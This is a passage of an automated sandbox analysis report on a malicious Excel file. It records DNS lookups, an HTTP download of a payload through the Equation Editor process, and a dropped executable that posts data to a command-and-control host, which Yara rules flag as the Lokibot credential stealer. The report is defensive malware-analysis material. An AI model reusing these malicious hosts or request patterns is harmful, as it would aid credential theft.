                Feb 16, 2021 07:02:47.351191998 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.351226091 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.351228952 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.351247072 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123

                UDP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Feb 16, 2021 07:02:44.463685989 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 16, 2021 07:02:44.512727976 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                Feb 16, 2021 07:02:45.061305046 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 16, 2021 07:02:45.124488115 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                Feb 16, 2021 07:02:45.124819994 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 16, 2021 07:02:45.185965061 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                Feb 16, 2021 07:02:45.203356981 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 16, 2021 07:02:45.260385036 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                Feb 16, 2021 07:02:45.260708094 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 16, 2021 07:02:45.309402943 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                Feb 16, 2021 07:02:46.157924891 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 16, 2021 07:02:46.235662937 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
                Feb 16, 2021 07:02:50.794610023 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 16, 2021 07:02:50.857706070 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22

                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Feb 16, 2021 07:02:44.463685989 CET | 192.168.2.22 | 8.8.8.8 | 0xf63a | Standard query (0) | cutt.ly | A (IP address) | IN (0x0001)
                Feb 16, 2021 07:02:46.157924891 CET | 192.168.2.22 | 8.8.8.8 | 0x3a6e | Standard query (0) | stdyrusschinetwomast.dns.army | A (IP address) | IN (0x0001)
                Feb 16, 2021 07:02:50.794610023 CET | 192.168.2.22 | 8.8.8.8 | 0x23e5 | Standard query (0) | becharnise.ir | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Feb 16, 2021 07:02:44.512727976 CET | 8.8.8.8 | 192.168.2.22 | 0xf63a | No error (0) | cutt.ly |  | 172.67.8.238 | A (IP address) | IN (0x0001)
                Feb 16, 2021 07:02:44.512727976 CET | 8.8.8.8 | 192.168.2.22 | 0xf63a | No error (0) | cutt.ly |  | 104.22.0.232 | A (IP address) | IN (0x0001)
                Feb 16, 2021 07:02:44.512727976 CET | 8.8.8.8 | 192.168.2.22 | 0xf63a | No error (0) | cutt.ly |  | 104.22.1.232 | A (IP address) | IN (0x0001)
                Feb 16, 2021 07:02:46.235662937 CET | 8.8.8.8 | 192.168.2.22 | 0x3a6e | No error (0) | stdyrusschinetwomast.dns.army |  | 103.141.138.123 | A (IP address) | IN (0x0001)
                Feb 16, 2021 07:02:50.857706070 CET | 8.8.8.8 | 192.168.2.22 | 0x23e5 | No error (0) | becharnise.ir |  | 185.208.180.121 | A (IP address) | IN (0x0001)

                HTTP Request Dependency Graph

                • stdyrusschinetwomast.dns.army
                • becharnise.ir

                HTTP Packets

                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.22 | 49167 | 103.141.138.123 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Timestamp | kBytes transferred | Direction | Data
                Feb 16, 2021 07:02:46.460187912 CET | 73 | OUT | GET /receiprt/regasm.exe HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Connection: Keep-Alive
                Host: stdyrusschinetwomast.dns.army
                Feb 16, 2021 07:02:46.682566881 CET | 75 | IN | HTTP/1.1 200 OK
                Date: Tue, 16 Feb 2021 06:02:42 GMT
                Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                Last-Modified: Tue, 16 Feb 2021 01:44:33 GMT
                ETag: "41c00-5bb6a3e863566"
                Accept-Ranges: bytes
                Content-Length: 269312
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/x-msdownload


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.22 | 49168 | 185.208.180.121 | 80 | C:\Users\Public\vbc.exe
                Timestamp | kBytes transferred | Direction | Data
                Feb 16, 2021 07:02:51.005729914 CET | 359 | OUT | POST /fa13/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: becharnise.ir
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4081BD40
                Content-Length: 176
                Connection: close


                HTTPS Packets

                Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                Feb 16, 2021 07:02:44.655622959 CET | 172.67.8.238 | 443 | 192.168.2.22 | 49165 | CN=www.cutt.ly | CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | Sat Feb 08 01:00:00 CET 2020 | Thu Apr 08 14:00:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
                (chain, intermediate) | | | | | CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Nov 02 13:24:33 CET 2017 | Tue Nov 02 13:24:33 CET 2027 | |

                Code Manipulations

                Statistics

                Behavior


                System Behavior

                General

                Start time: 07:01:50
                Start date: 16/02/2021
                Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit): false
                Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase: 0x13f0d0000
                File size: 27641504 bytes
                MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 07:02:10
                Start date: 16/02/2021
                Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Wow64 process (32bit): true
                Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Imagebase: 0x400000
                File size: 543304 bytes
                MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 07:02:14
                Start date: 16/02/2021
                Path: C:\Users\Public\vbc.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Users\Public\vbc.exe'
                Imagebase: 0x400000
                File size: 269312 bytes
                MD5 hash: 2559B5B8D60DD663DF52D0570F5973A9
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                • Detection: 36%, ReversingLabs
                Reputation: low

                Disassembly

                Code Analysis
